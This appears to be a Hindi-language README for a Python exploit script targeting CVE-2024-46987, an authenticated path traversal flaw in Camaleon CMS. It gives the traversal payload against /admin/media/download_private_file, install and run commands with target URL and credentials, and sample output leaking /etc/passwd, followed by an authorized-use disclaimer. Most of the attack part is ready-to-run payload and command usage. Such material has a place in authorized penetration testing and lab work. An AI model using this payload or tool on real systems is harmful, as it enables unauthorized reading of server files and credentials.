
Python का उपयोग करके बनाया गया Exploit
CVE-2024-46987 Camaleon CMS (Ruby on Rails-आधारित सामग्री प्रबंधन प्रणाली) में एक प्रमाणित पाथ ट्रैवर्सल भेद्यता (CWE-22) है। यह एक लॉग-इन उपयोगकर्ता (कम विशेषाधिकारों वाले को भी) को MediaController#download_private_file एक्शन के माध्यम से सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देता है।
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:Nमान्य क्रेडेंशियल वाला एक हमलावर निम्नलिखित पर एक क्राफ्टेड अनुरोध भेज सकता है: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtया
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
नोट: स्क्रिप्ट Rails-शैली लॉगिन फ़ॉर्म (user[email], user[password], authenticity_token) मानती है। यदि आपका लक्ष्य कस्टम नामों का उपयोग करता है तो पेलोड फ़ील्ड समायोजित करें।
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण प्रयोजनों के लिए प्रदान किया गया है।
इसका उपयोग केवल उन्हीं प्रणालियों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है (जैसे, बग बाउंटी प्रोग्राम, आंतरिक पेनटेस्ट, HTB जैसी प्रयोगशालाएँ)। अनधिकृत उपयोग कानूनों का उल्लंघन कर सकता है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।